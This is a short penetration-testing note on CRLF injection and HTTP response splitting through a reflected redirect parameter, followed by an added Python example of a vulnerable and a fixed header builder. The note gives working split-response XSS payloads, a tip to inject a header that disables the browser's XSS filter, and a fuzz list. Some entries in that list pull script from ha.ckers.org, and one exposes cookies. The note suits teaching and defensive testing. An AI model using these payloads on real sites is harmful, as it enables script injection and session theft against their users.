Contents
- Simple note:
- Tips:
- Reference
Simple note:
CRLF: Carriage-Return Line-Feed. CR is ASCII 13, `\r` (carriage return); LF is ASCII 10, `\n` (line feed). URL-encoded as `%0d%0a`, the pair can be used to break an HTTP request or response into extra lines.
In a penetration test, if we find a request like this, where the `url` parameter is under our control:

```
GET /test/demo.php?url=https://www.threezh1.com    <- value that we can control
...
```
If the parameter value is reflected into the HTTP headers of the response, we can control the response headers (including the URL in the Location header):

```
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: deflate
...
Location: https:    <- value that we can control
...
```
Then we can test further by changing the `url` parameter to:

```
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<script>alert(1)</script>
```

which, once decoded by the server, is equivalent to the following response:

```
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 47

<script>alert(1)</script>
```

or you can choose to use an image tag instead: `<img src=1>`

If the window pops up successfully, there is a CRLF injection.
Tips:
When the XSS is intercepted by the browser's filter, you can add the header `X-XSS-Protection: 0` through the same injection to bypass it.

If you meet a CRLF injection point that has some filters in front of it, you can fuzz the point with the dictionary (wordlist) of C1h2e1.
FUZZ:

```
%0d%0a
%0d%0a%0d%0a
r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d%0a<html>Injected%02Content</html>
%0d%0d%0a%0a
0x0D0x0A
0x0D0x0D0x0A0x0A
\r\n
%5cr%5cn
%0%0d%0ad%0%0d%0aa
%0%0D%0AD%0%0D%0AA
%0d%0aContentType:%20text/html;charset=UTF-7%0d%0aContent-Length:%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies:%27%2Bdocument.cookie%29%2BADw-/script%2BAD4-%2BADw-/body%2BAD4-%2BADw-/html%2BAD4
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com
%0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E
%0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E
%22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22
%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
```
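As an added example (not code from the original note or from threezh1.com), the Python below shows, from the server's side, why the response in the first section splits and why the fuzz list above contains double-encoded entries: a handler that reflects the `url` parameter into a Location header unchecked, the fixed handler that refuses any control character in the decoded value, and a check that runs a wordlist entry through a naive filter that deletes the literal `%0d%0a` once before decoding. The handler names, the naive filter and the sample request are assumptions made for this example.

```python
"""Added example: vulnerable vs. fixed redirect builder, and a check of the
naive '%0d%0a' blacklist against double-encoded fuzz entries.

Hypothetical: build_redirect / build_redirect_safe stand in for server code
that reflects a `url` query parameter into a Location header.
"""
from urllib.parse import unquote

CRLF = "\r\n"
SITE = "https://www.threezh1.com"  # the URL used in the note

# Constructed sample: the note's payload as the server sees it after its
# framework URL-decodes the query string once.
PAYLOAD = unquote(
    "%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a"
    "Content-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a"
    "<script>alert(1)</script>"
)


def build_redirect(url: str) -> bytes:
    """Vulnerable: the decoded parameter is written into the header unchecked."""
    return (
        "HTTP/1.1 302 Found" + CRLF
        + "Connection: keep-alive" + CRLF
        + "Location: " + url + CRLF
        + CRLF
    ).encode("latin-1")


def is_safe_header_value(value: str) -> bool:
    """Header field values may not contain CR, LF, DEL or other C0 controls (HTAB excepted)."""
    return not any((ord(c) < 0x20 and c != "\t") or c == "\x7f" for c in value)


def build_redirect_safe(url: str) -> bytes:
    """Fixed: refuse the request instead of emitting a header that contains control characters."""
    if not is_safe_header_value(url):
        raise ValueError("control character in Location value")
    return build_redirect(url)


def is_rejected(url: str) -> bool:
    """True when the fixed builder refuses the value."""
    try:
        build_redirect_safe(url)
    except ValueError:
        return True
    return False


def count_responses(raw: bytes) -> int:
    """Number of status lines in the bytes on the wire; more than one means the response was split."""
    return sum(1 for line in raw.split(b"\r\n") if line.startswith(b"HTTP/1."))


def strip_crlf_once(encoded: str) -> str:
    """A naive blacklist filter (assumed for this example): delete the literal token before decoding."""
    return encoded.replace("%0d%0a", "").replace("%0D%0A", "")


def bypasses_naive_filter(encoded: str) -> bool:
    """True when a fuzz entry still decodes to a CR or LF after the naive filter ran."""
    decoded = unquote(strip_crlf_once(encoded))
    return not is_safe_header_value(decoded)


if __name__ == "__main__":
    # The vulnerable builder turns one request into two responses on the wire.
    print("vulnerable:", count_responses(build_redirect(SITE + PAYLOAD)), "responses")
    # The fixed builder refuses the same value.
    print("fixed rejects payload:", is_rejected(SITE + PAYLOAD))
    # Double-encoded entries from the wordlist survive a single-pass blacklist.
    for entry in ["%0d%0a", "%0%0d%0ad%0%0d%0aa", "%0d%0d%0a%0a", "%5cr%5cn"]:
        print(f"{entry!r}: bypasses naive filter = {bypasses_naive_filter(entry)}")
```

The point of `bypasses_naive_filter` is that `%0%0d%0ad%0%0d%0aa` collapses to `%0d%0a` after one deletion pass, so a filter that runs before decoding, or only once, lets CRLF through; the durable fix is to validate the decoded value (as `build_redirect_safe` does) or to use a framework that refuses control characters in header values.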
Reference
- By: threezh1.com